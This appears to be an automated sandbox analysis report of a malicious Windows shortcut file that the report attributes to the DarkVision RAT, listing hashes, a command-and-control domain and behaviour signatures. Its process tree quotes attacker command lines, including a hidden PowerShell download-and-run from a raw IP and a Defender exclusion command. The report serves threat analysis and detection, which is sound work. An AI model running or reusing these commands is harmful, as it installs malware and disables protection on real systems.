Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-12-2024 08:32
Static task
static1
Behavioral task
behavioral1
Sample
009274965.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
009274965.lnk
Resource
win10v2004-20241007-en
General
-
Target
009274965.lnk
-
Size
2KB
-
MD5
7f070dfbaa6893bb2effac0f2320a1d7
-
SHA1
293e7f6f6e70a0c7699215b3402dc5ff2bb2bfaa
-
SHA256
aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2
-
SHA512
720b2a90dd051160aeaa1a11a70433213b96f04e8d160c55c699f4fd6af7f1c07db61e110e684d9ce91ad79e987bd809497eb2d52ac2f3bd96cdb289c443b883
Malware Config
Extracted
darkvision
acuweld.ddns.net
Signatures
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 3648 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 3648 powershell.exe 3648 powershell.exe 2928 powershell.exe 1076 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion windows.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion windows.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnk explorer.exe -
Executes dropped EXE 2 IoCs
pid Process 2008 file.exe 4112 windows.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3648 powershell.exe 3648 powershell.exe 2928 powershell.exe 2928 powershell.exe 1076 powershell.exe 1076 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 4112 windows.exe 4112 windows.exe 4112 windows.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3648 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2624 wrote to memory of 3648 2624 cmd.exe 84 PID 2624 wrote to memory of 3648 2624 cmd.exe 84 PID 3648 wrote to memory of 2008 3648 powershell.exe 87 PID 3648 wrote to memory of 2008 3648 powershell.exe 87 PID 2008 wrote to memory of 3668 2008 file.exe 88 PID 2008 wrote to memory of 3668 2008 file.exe 88 PID 3668 wrote to memory of 2928 3668 cmd.exe 90 PID 3668 wrote to memory of 2928 3668 cmd.exe 90 PID 2008 wrote to memory of 4112 2008 file.exe 91 PID 2008 wrote to memory of 4112 2008 file.exe 91 PID 4112 wrote to memory of 3312 4112 windows.exe 96 PID 4112 wrote to memory of 3312 4112 windows.exe 96 PID 4112 wrote to memory of 3900 4112 windows.exe 98 PID 4112 wrote to memory of 3900 4112 windows.exe 98 PID 3312 wrote to memory of 1076 3312 cmd.exe 99 PID 3312 wrote to memory of 1076 3312 cmd.exe 99
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\009274965.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'4⤵
- Suspicious use of WriteProcessMemory
PID:3668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
-
C:\ProgramData\windows\windows.exe"C:\ProgramData\windows\windows.exe" {05756468-6434-465A-9313-8CAA82F857B2}4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'5⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"5⤵
- Checks BIOS information in registry
- Drops startup file
PID:3900
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD570595b5937369a2592a524db67e208d3
SHA1d989b934d9388104189f365694e794835aa6f52f
SHA256be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8
SHA512edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5
-
Filesize
944B
MD564a10d8c6b5db372b97edf35ede19e5e
SHA13f4d2156f3a2f53422a9cbdc421ef1220194349b
SHA25681b2060200caac5f5790306c2b23fd3b0e4fb8806d02f34fc9f1c86d61cbfc3b
SHA512ec3aa311a0ab17211b14cf10ca53f1ea4750b896e5171c5557c6ac92da48c2d23dc5ffbf920d5aab77d40612270b498713f180090fda157c15fa20cac91d96ce
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.0MB
MD5d37285bf0331c7514e5e4cec0fbe647c
SHA12a83f532b50fb5acd4f417c2ce51a1eac1bb9c08
SHA256f96c269716f360aa2fbb1926dda79c3ff47ea7d8ec6615cde06b205d28400f79
SHA512d1a9f56a504bc6d13a0af3ac1caf97d9bc86ace60577b87a2f7143c3c94ade29605559b9122c19d2a8ca2f817d6efe123a24c75012b9c22241fbcdf2938b1d81